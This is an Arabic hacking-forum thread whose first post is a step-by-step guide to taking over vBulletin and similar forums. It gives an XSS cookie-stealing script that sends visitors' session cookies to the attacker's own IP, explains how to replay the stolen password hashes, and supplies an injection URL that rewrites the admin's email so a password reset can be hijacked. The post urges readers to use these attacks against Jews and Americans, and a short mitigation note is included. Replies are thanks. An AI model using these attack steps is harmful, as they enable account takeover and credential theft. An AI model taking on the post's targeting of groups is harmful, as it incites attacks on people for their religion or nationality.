ثغرة اختراق المواقع

ثغرة اختراق المواقع


النتائج 1 إلى 6 من 6

الموضوع: ثغرة اختراق المواقع

  1. #1

    Come ثغرة اختراق المواقع

    المنتديات, اختراق, ثغرات

    ثغرات اختراق المنتديات

    بسم الله الرحمن الرحيم
    هذا الموضوع يحتوي على معلومات كثيرة ومفيدة لكل الهاكرز وبجميع مستوياتهم فأرجوا منكم أن لا تستخدموا هذه المعلومات في مضرة المسلمين و إيذاء إخوانكم في الدين
    ولكن أرجوا أن تستخدموها ضد اليهود والامريكان

    أولا سم بالله وابدأ :
    بسم الله الرحمن الرحيم


    جميع طرق اختراق المنتديات


    ---------
    مقدمة :
    ---------

    الموضوع : اختراق الـ vBulletin
    المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
    المستوى : متوسط

    ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .


    ----------
    الثغرة :
    ---------

    تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
    بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

    قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
    src="http://my_ip_address/'+****************+'">';</script>

    مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

    وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
    من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
    الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

    وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
    مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
    ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

    ابحث عن الكود الخاص بالباسورد .. مثال :

    GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb









    ddf90622;%20sessionhash=a
    4719cd620534914930b86839c4bb5f8;%20bbthreadview[54









    20]=1012444064;%20bblastvi
    sit=1011983161

    فكر قليلا الان .. اين الباسورد ؟؟
    الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
    قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
    http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
    ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
    في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
    لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
    وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

    اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

    ------------
    الحل
    -----------

    للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
    (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

    كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
    Be Secret .. Dont' be Lamer .

    تاريخ اكتشاف الثغرة : 31 - 1 - 2002
    تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


    أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين



    ======================================
    إختراق منتديات VP
    ======================================
    اختراق المنتديات بس بمنتديات vb

    . قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

    2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

    3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

    أو العنوان التفصيلي التالي :
    http://URL/memberlist.php

    URL = العنوان المستضيف للمنتدى

    مثل = - .com

    4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

    سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

    http://URL/member.php?soitgoe68e45u...info&userid=266

    هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

    5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

    http://URL/member.php?soitgoe68e45u...etinfo&userid=1

    العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

    (((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

    أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

    6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

    http://URL/member.php?action=login&...VALIDPASS&url=');'.$use rs=$DB_site->query('update+user+set+email=' -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -'+WH E RE+username='ADMIN'').'

    العنوان هذا ستقوم بتغيير الكلمات التالية

    URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
    VALIDUSER = أسم المستخدم الخاص بك
    VALIDPASS = كلمة السر الخاصة بك
    -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة - = البريد الذي سجلت به بالمنتدى
    ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

    7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات ******* .

    8. ثم ترجع لصفحة المنتدى الرئيسية
    http://url/index.php

    ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

    بالطيع ستظهر لك الصفحة التعيسة التي تقول :

    أنت قمت بكتابة كلمة سر خاطئة

    you typed in the wrong password


    9. بكل بساطة أضغط على

    نسيت كلمة السر
    forgot password

    والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

    10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

    ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم

    ======================================
    إختراق منتديات xmb
    ======================================
    تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..

  2. #2
    هكر متميز الصورة الرمزية hooos
    تاريخ التسجيل
    Jul 2010
    الدولة
    في كوكب لوحدي
    المشاركات
    1,878

    افتراضي رد: ثغرة اختراق المواقع

    مشكور والله يعطيك العافيه

  3. #3

    افتراضي رد: ثغرة اختراق المواقع

    مشكووووووووووووور

  4. #4
    محظور
    تاريخ التسجيل
    Dec 2010
    الدولة
    نهاية العالم
    المشاركات
    242

    افتراضي رد: ثغرة اختراق المواقع

    مشكوررررررررررررررررررررر رررررررررررر

  5. #5
    هكر مبتديء الصورة الرمزية hoooda201
    تاريخ التسجيل
    Jan 2011
    الدولة
    فى جيوش الهكرز
    المشاركات
    16

    افتراضي رد: ثغرة اختراق المواقع

    مشكوووووووور جدا طبعا

    بس انا مش لاقى كلمة validuser فى العنوان اللى انت كتبته

  6. #6

    افتراضي رد: ثغرة اختراق المواقع

    thanks

    thank you

    merci
    شــكــرا

المواضيع المتشابهه

  1. اقوى ثغرة اختراق الايميلات الهوتميل
    بواسطة مهكر القلوب في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 19
    آخر مشاركة: 05-23-2012, 02:37 PM
  2. اختراق المنتديات عن طريق ثغرة Html
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى إختراق المنتديات
    مشاركات: 11
    آخر مشاركة: 04-08-2011, 10:46 PM
  3. معنى المواقع المصابة بالحقن / ثغرة sql /
    بواسطة tarik_leking في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 2
    آخر مشاركة: 09-30-2010, 03:11 AM
  4. شرح ثغرة سكريبت لاختراق المواقع بالفيديو
    بواسطة galylof في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 01-04-2010, 01:43 AM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •